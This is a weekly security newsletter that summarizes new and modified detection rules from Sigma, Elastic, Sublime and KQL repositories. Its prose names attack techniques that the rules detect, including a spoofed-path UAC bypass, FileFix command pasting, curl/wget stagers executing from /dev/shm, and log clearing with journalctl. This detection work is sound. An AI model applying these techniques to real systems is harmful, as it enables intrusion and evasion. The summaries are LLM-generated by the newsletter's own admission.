Detections Digest #20250630
This issue highlights key updates to detection rules from 9 GitHub repositories, including 33 new additions and 36 modifications.
This week's update highlights the most significant changes to detection rules from 9 of the 40+ monitored GitHub repositories. Between Jun 23 and Jun 30, 2025, contributors added 33 new rules and updated 36 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
New rules target a Windows UAC bypass using a spoofed system path with an extra space, with coverage now including the SysWOW64 directory. Detections were also added for the 'FileFix' social engineering technique, identifying LOLBINs spawned from browsers with a '#' in the command line. Both repositories also introduced rules to detect the MeshAgent RAT by its specific command-line arguments, even when the executable is renamed. (
SigmaHQ/sigma,Yamato-Security/hayabusa-rules)Detection for Microsoft cloud services has expanded. New Elastic rules identify Entra ID refresh token theft and anomalous mail access in Microsoft 365. Concurrently, new KQL queries hunt for M365 Direct Send abuse, risky external OAuth applications, and high-privilege identities using the Defender Exposure Graph. (
elastic/detection-rules,SlimKQL/Hunting-Queries-Detection-Rules,alexverboon/Hunting-Queries-Detection-Rules)Detections for Linux endpoint threats have increased. A new Sigma rule finds common malware stagers that use curl or wget to download and execute payloads from shared memory. Elastic Protections added a YARA rule for generic Linux rootkits that finds kernel symbol lookups and updated signatures for Mirai malware variants. (
SigmaHQ/sigma,elastic/protections-artifacts)Phishing detections were updated to address modern techniques. New rules identify brand impersonation of services like Zoom and Dropbox, with some rules using machine learning models. Existing rules were modified to counter obfuscation with regular expressions, check for homograph attacks, and analyze PDFs inside attached EML files. (
sublime-security/sublime-rules)Rule logic was refined across multiple repositories to improve accuracy. Elastic improved its Kubernetes rules by targeting a specific audit log index to increase query performance. New OSQuery rules from Chainguard detect potential Salesforce data exfiltration on macOS and Linux by looking for specific file names and metadata. Sigma reduced false positives in its remote thread creation rules by excluding legitimate system processes. (
elastic/detection-rules,SigmaHQ/sigma,chainguard-dev/osquery-defense-kit)
💡 Make updates from this digest operational.
CTIChef.com delivers all detection rules from this digest (and more) as structured, high-fidelity CTI feeds. Subscribe and integrate directly into your SIEM, TIP, or SOAR to automate threat detection and enrich your existing security data.
No sales talk, transparent pricing, fast integration, and clear value.
Table Of Contents
sublime-security/sublime-rules (+4, ✎4)
SigmaHQ/sigma (+7, ✎4)
Yamato-Security/hayabusa-rules (+9, ✎4)
elastic/detection-rules (+3, ✎15)
elastic/protections-artifacts (+1, ✎9)
Corporate repositories (6)
sublime-security/sublime-rules (+4, ✎4)
+ New rules
Four new rules detect phishing attacks, including brand impersonation of Zoom, Dropbox, and Intuit. The detections identify common phishing indicators such as links to free file hosting services, sender anomalies, and mismatched links. Several rules use machine learning models to analyze message content for credential theft intent. (Zoom Events Newsletter Abuse, Mismatched Links: Free File Share With Urgent Language, Deceptive Dropbox Mention, Link: Intuit Link Abuse with File Share Context)
✎ Modified rules
Two rules targeting brand and service impersonation were updated. The e-signature phishing rule now uses regular expressions against obfuscated keywords and checks link text for homograph attacks. The TikTok impersonation rule adds body keyword checks for verification-themed lures. (Credential Phishing: Suspicious E-sign Agreement Document Notification, Brand Impersonation: TikTok)
Detection logic was broadened for phishing emails with suspicious technical characteristics. One rule now analyzes PDFs inside attached EML files and has refined metadata checks for auto-generated documents. Another rule more reliably identifies mass emails sent to 'undisclosed recipients' through case-insensitive pattern matching and a relaxed BCC count. (Attachment: Suspicious PDF Created With Headless Browser, Suspicious Recipients pattern with NLU credential theft indicators)
SigmaHQ/sigma (+7, ✎4)
+ New rules
New rules detect the MeshAgent remote access tool across Windows and macOS. The detection logic focuses on the '--meshServiceName' command-line argument to identify activity even when the executable is renamed. Additional logic checks original filenames to find altered instances. (Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Potential MeshAgent Execution - MacOS, Remote Access Tool - Renamed MeshAgent Execution - MacOS, Remote Access Tool - Renamed MeshAgent Execution - Windows)
A new rule detects a UAC bypass technique on Windows. It identifies DLL loading from a spoofed system path containing an extra space, a method used to circumvent trusted path verification for privilege escalation. (Trusted Path Bypass via Windows Directory Spoofing)
A new rule identifies a common malware stager pattern on Linux. The detection targets the use of curl or wget to download payloads into temporary directories like /dev/shm and immediately execute them with a shell. (Suspicious Download and Execute Pattern via Curl/Wget)
A new rule detects the 'FileFix' social engineering technique. It identifies web browsers spawning LOLBINs with a '#' character in the command line, which is characteristic of users being tricked into pasting malicious commands into a file explorer dialog. (FileFix - Suspicious Child Process from Browser File Upload Abuse)
✎ Modified rules
Two Windows detections were refined to lower false positives. The rule for AppX package sideloading now excludes installations from OneDrive paths, and the rule for suspicious remote thread creation now filters out legitimate interactions from Defrag.exe and VMware Tools. (Uncommon AppX Package Locations, Rare Remote Thread Creation By Uncommon Source Image)
Detection coverage was expanded for defense evasion techniques on Windows and Linux. The rule for a Windows UAC bypass using trailing-space directories now includes the C:\\Windows \\SysWOW64\\ path. The rule for Linux log clearing was updated to detect the journalctl --vacuum command. (Commands to Clear or Remove the Syslog, TrustedPath UAC Bypass Pattern)
Yamato-Security/hayabusa-rules (+9, ✎4)
+ New rules
Multiple new rules detect execution of the MeshAgent RMM tool, including renamed instances. Detection logic focuses on the specific '--meshServiceName' command-line argument found in Windows process creation events and Sysmon logs, which finds the tool even if the executable name is changed. (Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Renamed MeshAgent Execution - Windows, Remote Access Tool - Renamed MeshAgent Execution - Windows)
New rules detect remote MSI package installation via PowerShell. The logic identifies the use of the WindowsInstaller.Installer COM object, a method that bypasses direct msiexec.exe monitoring and can be used for malicious software deployment. (PowerShell MSI Install via WindowsInstaller COM From Remote Location, PowerShell MSI Install via WindowsInstaller COM From Remote Location)
Two new rules detect the 'FileFix' social engineering technique. They identify system utilities spawned from browser processes where the command line contains a '#' character, a specific indicator of this attack where a user is tricked into running commands. (FileFix - Suspicious Child Process from Browser File Upload Abuse, FileFix - Suspicious Child Process from Browser File Upload Abuse)
A new rule detects a UAC bypass technique involving DLL loading from a spoofed Windows directory. The detection finds paths with an extra space, such as 'C:\Windows \System32', used to bypass trusted path verification. (Trusted Path Bypass via Windows Directory Spoofing)
✎ Modified rules
Two rules detecting process injection via remote thread creation (Sysmon Event ID 8) were updated. The changes add new exclusions for legitimate system behaviors involving processes like explorer.exe, winlogon.exe, and Defrag.exe. This reduces false positives for detections that monitor both common and uncommon source processes. (Remote Thread Creation By Uncommon Source Image, Rare Remote Thread Creation By Uncommon Source Image)
Detection coverage for a User Account Control bypass technique was broadened across two rules. The updates add the C:\Windows \SysWOW64\ path to identify malicious process creation from spoofed trusted directories, improving detection of this bypass on 64-bit systems. (TrustedPath UAC Bypass Pattern, TrustedPath UAC Bypass Pattern)
elastic/detection-rules (+3, ✎15)
+ New rules
Three new rules add detection for Microsoft cloud threats. The rules identify credential abuse and data exfiltration by monitoring for suspicious mail access via unusual client applications, Entra ID sign-in patterns indicating refresh token theft, and excessive access to mailbox items in Microsoft 365. (Suspicious Microsoft 365 Mail Access by Unusual ClientAppId, Entra ID RT to PRT Transition from Same User and Device, Excessive Microsoft 365 Mailbox Items Accessed)
✎ Modified rules
Multiple Kubernetes detection rules were updated to query the specific logs-kubernetes.audit_logs-* index instead of a broad pattern. This change improves query performance and accuracy for rules that detect container privilege escalation, sensitive host path mounting, and service account abuse by focusing searches on Kubernetes audit logs. (Kubernetes Container Created with Excessive Linux Capabilities, Kubernetes Pod Created With HostIPC, Kubernetes Denied Service Account Request, Kubernetes Suspicious Self-Subject Review, Kubernetes User Exec into Pod, Kubernetes Pod Created With HostPID, Kubernetes Privileged Pod Created, Kubernetes Pod created with a Sensitive hostPath Volume, Kubernetes Suspicious Assignment of Controller Service Account)
Several AWS rules for detecting infrequent activity were updated for greater precision. Detections for SSM command execution and STS role assumption now use a combination of cloud.account.id and user.name to identify new user actions. This change provides more reliable detection of potential credential abuse and privilege escalation. (AWS SSM SendCommand Execution by Rare User, AWS STS Role Assumption by User, AWS STS Role Assumption by Service, AWS SSM Command Document Created by Rare User)
The rule for detecting suspicious NewCredentials logon events on Windows was modified to reduce false positives. The update refines process path exclusions to better filter legitimate applications, improving focus on potential token impersonation techniques. (First Time Seen NewCredentials Logon Process)
The correlation rule for identifying hosts with alerts across multiple MITRE ATT&CK tactics was updated. The rule now groups alerts using both host.id and host.name, improving the reliability of identifying systems undergoing multi-stage attacks. (Multiple Alerts in Different ATT&CK Tactics on a Single Host)
chainguard-dev/osquery-defense-kit (+2)
+ New rules
Two new OSQuery rules detect potential data exfiltration from Salesforce on macOS and Linux. One rule uses Spotlight metadata on macOS to find large files originating from Salesforce domains. The other rule identifies common Salesforce export file naming conventions in user download directories on both operating systems. (Surface Salesforce exports (possible data exfiltration), Salesforce Large Download Generic)
elastic/protections-artifacts (+1, ✎9)
+ New rules
A new YARA rule for Elastic EDR detects Linux rootkits. The rule identifies loadable kernel modules that attempt to resolve kernel symbols, a common technique for function hooking. Detection is based on finding the kallsyms_lookup_name_t string along with specific open-source license strings within the module. (Linux_Rootkit_Generic_5d17781b)
✎ Modified rules
Two YARA rules now detect specific variants of the Linux.Trojan.Mirai malware on x86 systems. Detection is based on matching unique hexadecimal byte sequences in files or memory. (Linux_Trojan_Mirai_0cb1699c, Linux_Trojan_Mirai_d5f2abe2)
A rule for detecting Linux rootkits now identifies a wider range of malicious indicators. It searches for combinations of function names, keywords, and system-level strings associated with kernel hooking, process hiding, and privilege escalation on x86 and arm64 architectures. (Linux_Rootkit_Generic_5d17781b)
Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that consolidates updates from 80+ sources (government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals.
Personal repositories (3)
SlimKQL/Hunting-Queries-Detection-Rules (+4)
+ New rules
Two new rules target abuse of Microsoft 365 services. One detects phishing attempts using the Direct Send feature by monitoring specific DNS query patterns. The other identifies potentially malicious external OAuth applications in Exchange Online by flagging uncommon user access from foreign locations. (Direct Send Abuse Detection, Detect anomalous external OAuthApp activity using ActorInfoString)
A new hunting query detects a campaign using Cloudflare Tunnels for malware delivery. The rule ingests an external list of IOCs and searches for matches across email, file, and network telemetry in Microsoft Defender XDR. (Hackers Exploit Cloudflare Tunnels to Infect Windows Systems With Python Malware)
A new query hunts for the execution of mshta.exe, a utility often used by adversaries for proxy code execution. The rule monitors DeviceProcessEvents for any command line invocation of this binary. (Suspicious MSHTA Usage)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
+ New rules
A new KQL rule detects command-line data exports to text or CSV files. This activity is a common data staging method used before exfiltration, often seen in ransomware attacks gathering local system or Active Directory information. (Detecting Text and CSV Data Dumps via Command Line)
alexverboon/Hunting-Queries-Detection-Rules (+2)
+ New rules
Two new KQL queries use the Microsoft Defender XDR Exposure Graph to identify high-risk cloud configurations. One rule detects identities assigned 'Owner' or 'Contributor' roles to find privilege escalation risks. The other identifies potential lateral movement paths by correlating vulnerable VMs with access to critical storage accounts. (High-Privilege Identities Across Subscriptions, Trace Lateral Movement)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.